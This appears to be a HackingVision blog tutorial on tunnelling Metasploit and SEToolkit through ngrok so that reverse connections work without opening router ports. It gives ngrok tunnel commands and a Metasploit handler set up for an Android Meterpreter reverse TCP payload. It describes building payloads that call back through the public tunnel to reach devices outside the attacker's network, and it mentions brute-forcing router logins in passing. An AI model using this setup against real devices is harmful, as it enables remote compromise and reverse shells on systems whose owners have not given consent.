How to Use Metasploit, SEToolkit Without Opening Ports Kali Linux
It can be quite annoying when you have limited access to ports on a network this can cause problems when pentesting as you can only test traffic within the same network. Unless of course you could open the correct ports from within the router default administration panel for whatever reason sometimes access to administration panels are forbidden for example if your using a mobile hotspot, another example corporate networks hide there panels and some home routers that play up even when the tester has access to opening the ports. Unless they just haven’t had the time to brute force a login yet, most Wireless routers will only allow the administrator to open ports today you will learn how to route your connections through a external secure tunnel this will allow us to use various pentesting tools such as Metasploit & SEToolkit outside our network.
- First of all create a disposable email address using getnada.com or a similar disposable email service. getnada
- Download ngrok In your browser go to ngrok.com and choose a download that suits your CPU architecture. Ngrok is a website that provides secure TCP tunnels for free. Once download has completed extract the Zip archive and then cd into it for example “cd ngrok”
- Install your authtoken (auth code below is a example copy auth token from ngrok.com account.Copy the authentication code from your account in ngrok.com we will be using this to authenticate our tunnel. You can do this by going to the folder where ngrok is stored and using .”/ngrok authtoken yourauthtokenhere ” The authentication code will then be saved.
./ngrok authtoken UHTsJVmnmrninfibyuvtc_2b9xscccvdvdfsaq8f7z3
- To create your first secure tunnel use the command below to set up a tunnel on port 80 I’m using http port 80 for SET use whatever port you would like ngrok to tunnel through.
./ngrok http 80
- Open the web interface at http://localhost:4040 to inspect and replay requests in a web browser of your choice.Starting Metasploit First you will need to start Ngrok using tcp commands as Metasploit will be using a reverse TCP connection. Open up a new terminal and start Metasploit using command below.
./ngrok tcp 4444
Use your local host to set srvhost and lhost.
set lhost 0.0.0.0 set lport 4444 set uripath /
Use port you used to set up ngrok as srvport this will help us with tunneling a Metasploit or SEToolkit session through the Internet.
In this tutorial I will set a handler up using settings above for Ngrok. Many reading this guide could be using complete different exploits to minify confusion we will be showing you set up a Reverse TCP Metapreter Listener. This will help later when setting up tunnels with other pentesting tools that use reverse connections.
msfconsole msf > use multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 0.0.0.0 msf exploit(handler) > set srvhost 0.0.0.0 msf exploit(handler) > set srvport 4444 msf exploit(handler) > set uripath / msf exploit(handler) > exploit
When your creating Payloads for Metasploit you will need to include your tunnel and also the port your using for Ngrok.
When creating payloads use the domain provided by Ngrok or you can ping the domain to receive and IP and use the IP address from the results use the same port for payload as your listener.
This will work as a tunnel for many more pentesting tools this tutorial is not only limited to Metasploit and SEToolkit. Consider sharing this tutorial on social media & with your friends thank for supporting HackingVision we have listed some links below to help you create your TCP tunnels and payloads.
Feedback From Social Media
For more help and tips..Subscribe to our mailing list.